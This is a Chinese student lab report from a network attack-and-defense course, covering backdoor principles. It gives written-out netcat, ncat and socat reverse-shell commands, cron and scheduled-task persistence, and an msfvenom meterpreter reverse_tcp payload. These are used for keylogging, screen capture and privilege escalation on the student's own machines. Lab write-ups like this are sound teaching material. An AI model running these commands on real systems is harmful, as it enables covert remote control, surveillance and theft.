20145330 《网络攻防》 后门原理与实践

20145330 《网络攻防》 后门原理与实践

一、基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 使用安装介质,例如光盘或刻录的U盘将后门安装进系统。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • 修改系统配置
    • 添加启动项
    • 修改默认的Shell程序(默认为Explorer.exe,在登陆后失效)
    • 添加用户初始化程序(默认有一个Userinit.exe,在登陆后失效)
  • 系统服务和驱动程序方式
    • 安装自己的服务和驱动程序(调用CreatService Win32 API函数)
    • 修改原有的服务和驱动配置
    • 替换原有的服务和驱动程序文件
  • 替换或感染系统文件方式

(3)Meterpreter有哪些给你印象深刻的功能?

  • 得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息这些“惊悚”的功能都挺令我印象深刻的

(4)如何发现自己有系统有没有被安装后门?

  • 用杀毒软件查杀
  • 查看自己主机上有哪些用户,再查看用户权限

二、实践过程记录

1. 用nc获取远程主机的Shell

netcat:建立tcp连接将收到的内容发出去

linux ip:192.168.124.128

windows ip:192.168.1.221

886442-20170315200110307-976985810.png

886442-20170315200121151-1674953498.png

1.1 linux获取windows的shell

1.在kali下使用命令nc -l -p 5330对端口5330开始监听

886442-20170315200132479-1448379324.png

2.下载老师的附件ncat.rar,解压后放在一个可以找到路径的文件夹下
在windows的cmd下输入ncat.exe -e cmd 192.168.124.128 5330实现Windows反弹连接Linux

886442-20170315200143260-1734081647.png

3.返回Linux下看到Windows的命令提示,并使用ipconfig验证

886442-20170315200157401-1228704624.png

1.2 windows获取linux的shell

1.windows 打开监听,端口为5330,ncat.exe -l -p 5330

886442-20170315200207729-1824283641.png

2.Linux进行反弹连接win

886442-20170315200223948-1676715273.png

3.windows下获得一个linux shell,运行ls(可运行任何指令)

886442-20170315200236901-1625773813.png

1.3 cron启动

使用crontab -e修改配置文件,根据格式m h dom mon dow user command来填写启动的时间

886442-20170315200249526-1519487721.png

使用crontab -l查看配置文件

886442-20170315200305651-1031485053.png

kali系统内每分钟自动运行指令,反弹至pc端的5330端口

2 使用socat获取主机操作Shell

1.linux上用socat tcp-listen:5330把cmd绑定到端口5330
2.socat tcp-l:5330 system:bash,pty,stderrlinux反弹连接win

886442-20170315200321713-4432390.png

3.windows使用socat readline tcp:192.168.124.128 5330开启监听,监听成功后可进行任何操作,此处执行ls

886442-20170315200336088-467236804.png

  • 任务计划启动

在控制面板-管理工具-任务计划程序-创建任务

886442-20170315200352073-1169638279.png

886442-20170315200404666-370835457.png

输入命令 nc -l -p 5330进行测试

886442-20170315201105448-967357551.png

3 Meterpreter

3.1 生成20145330.exe

将可执行文件20145330.exe生成并复制在linux下,会将后门写入这个文件中。(注意此处ip为你虚拟机的ip~)


    root@KaliYL:/home/YL# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.221 LPORT=330 -f exe > 20145330.exe

886442-20170315200423588-1401354475.png

在home/TL路径下找到20145330.exe复制到win中

3.2 MSF打开监听进程

886442-20170315200435823-14086530.png

等待一会直到出现msf>继续完成

886442-20170315200448807-2077476596.png

886442-20170315200500916-1207214962.png

检查过程中突然发现没改端口号!!吓出一身冷汗试了下还好ctrl+C后可以再次更改,最后重新exploit

886442-20170315200520416-1299197901.png

双击win中20145330.exe并没有反应,排查不出错误所以只好重新来...

这次为swx5330.exe,双击后监听已经开始了,在windows中运行之前的后门程序可以成功获取shell

886442-20170315200534995-1483973759.png

4 使用MSF meterpreter

(此处我的靶机就是我自己的电脑...)

1.查看靶机信息

886442-20170315200547979-186979150.png

2.对靶机截屏

886442-20170315200603713-2072771047.png

886442-20170315200617057-1594751060.png

3.记录靶机键盘输入

886442-20170315200629323-646448988.png

4.安装为服务系统

(尝试第一种时失败第二种成功)

886442-20170315200641948-1793567497.png

5.获取目标主机的提权

886442-20170315200659963-1611223183.png

三、实验总结与体会

这次实验在多次尝试失败尝试失败中艰难成功完成了...对实验本身的掌握更深刻了。所以要经常用杀毒软件查杀电脑,好好保护电脑。

转载于:https://www.cnblogs.com/20145330swx/p/6556095.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值